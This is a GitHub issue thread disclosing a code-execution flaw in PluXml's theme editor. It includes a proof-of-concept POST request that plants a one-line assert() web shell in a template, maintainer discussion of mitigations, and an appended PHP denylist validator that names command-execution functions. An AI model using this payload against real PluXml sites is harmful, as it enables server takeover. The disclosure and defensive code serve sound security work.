
An issue in the theme edit function

Open jadacheng opened this issue 6 years ago • 6 comments

The theme edit function /PluXml/core/admin/parametres_edittpl.php allows remote attackers to execute arbitrary PHP code by placing this code into a template.

PoC: /PluXml/core/admin/parametres_edittpl.php [POST]token=603b37bed4a91d8b18a3507c46ae27df644a2ff4&template=%2Ftags.php&submit=Save+the+file&tpl=%2Ftags.php&content=%3C%3Fphp+assert%28%24_REQUEST%5B%27c%27%5D%29%3B%3F%3E%0D%0A

then visit /PluXml/themes/defaut/tags.php?c=phpinfo();


jadacheng avatar Feb 17 '19 15:02 jadacheng

Hello, I confirm this vulnerability. What's your recommendation? Using an XSS filter? Thanks for help.

haruka-7 avatar Feb 26 '19 21:02 haruka-7

You can disable the assert evaluation in php.ini. I have Ubuntu Bionic 18.04.2 and your code does not work. Display phpinfo and look for assert. I have "zend.assertions" equals -1 for local and global values.

bazooka07 avatar Mar 01 '19 16:03 bazooka07

assert_options(ASSERT_ACTIVE,false);

at the beginning of the index.php file?

jerrywham avatar Mar 03 '19 19:03 jerrywham

Any news?

jerrywham avatar May 06 '19 15:05 jerrywham

In fact, I think it's not a good idea for the webadmin to be able to edit .php files directly. Filtering is never enough. If you really need this feature, ignore this problem or verify that the webadmin is a system administrator.

jadacheng avatar May 07 '19 01:05 jadacheng

Hello, it appears CVE-2020-18184 has been assigned to this issue. However, the documentation seems to include a lot of instructions for how to execute arbitrary code in themes:

PluXml's plugin engine relies on a system of hooks (« crochets » in French) that allows PHP, HTML and JavaScript code to be injected into PluXml's own code.

https://wiki.pluxml.org/developper/developpement/

The examples even make extensive use of eval, which suggests to me that the feature is intended to allow administrators to execute anything they want any time they want.

Is this working as intended?

Thanks

setharnold avatar Oct 02 '20 21:10 setharnold

A new function plxUtils::sanitizePhp is added to PluXml. The value of the content field is checked with this function. It comments out critical functions in the PHP script, like: fsockopen, proc_open, system, exec, chroot, shell_exec, socket. See PR#589.

Of course, it's better to disable these critical functions in php.ini.

bazooka07 avatar Dec 14 '22 09:12 bazooka07
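As an added illustration of the approach described in the last comment (this is not PluXml's own plxUtils::sanitizePhp from PR#589 and not code from this thread), here is a token-based validator that a save handler could run over the submitted content field before writing a template; the denylist, the findDeniedCalls name and the sample template are all constructed for this example:

```php
<?php
// Added example, not PluXml code: reject a template that calls a denied
// function. The PHP tokenizer is used instead of a regex so that function
// names inside strings or comments are not matched, while calls written with
// unusual spacing or a leading backslash are still caught.

// Hypothetical denylist, modelled on the functions named in the thread.
const DENIED_FUNCTIONS = [
    'fsockopen', 'proc_open', 'system', 'exec', 'chroot', 'shell_exec',
    'socket_create', 'assert', 'passthru', 'popen',
];

// Returns [[name, line], ...] for every denied call found in $source.
function findDeniedCalls(string $source): array
{
    $found  = [];
    $tokens = token_get_all($source);
    $count  = count($tokens);
    $skip   = [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT];
    for ($i = 0; $i < $count; $i++) {
        $tok = $tokens[$i];
        if (!is_array($tok)) {
            continue;                      // single-character token such as '('
        }
        [$id, $text, $line] = $tok;
        if ($id === T_EVAL) {              // eval is a language construct, not T_STRING
            $found[] = ['eval', $line];
            continue;
        }
        $isName = $id === T_STRING
            || (defined('T_NAME_FULLY_QUALIFIED') && $id === T_NAME_FULLY_QUALIFIED);
        $name = strtolower(ltrim($text, '\\'));
        if (!$isName || !in_array($name, DENIED_FUNCTIONS, true)) {
            continue;
        }
        // Look past whitespace/comments for the '(' that makes this a call.
        $j = $i + 1;
        while ($j < $count && is_array($tokens[$j]) && in_array($tokens[$j][0], $skip, true)) {
            $j++;
        }
        if ($j < $count && $tokens[$j] === '(') {
            $found[] = [$name, $line];     // method calls of the same name are flagged too
        }
    }
    return $found;
}

// Constructed sample template: the string on line 3 is not a call, line 4 is.
$template = "<?php\n// theme template\necho \"system('x') inside a string\";\n\$out = shell_exec (\$cmd);\n?>";
foreach (findDeniedCalls($template) as [$name, $line]) {
    printf("denied function %s() at line %d\n", $name, $line);  // shell_exec() at line 4
}
```

A save handler would refuse the write when the returned list is non-empty; as the thread notes, this is a secondary control and disable_functions and zend.assertions=-1 in php.ini remain the primary mitigation.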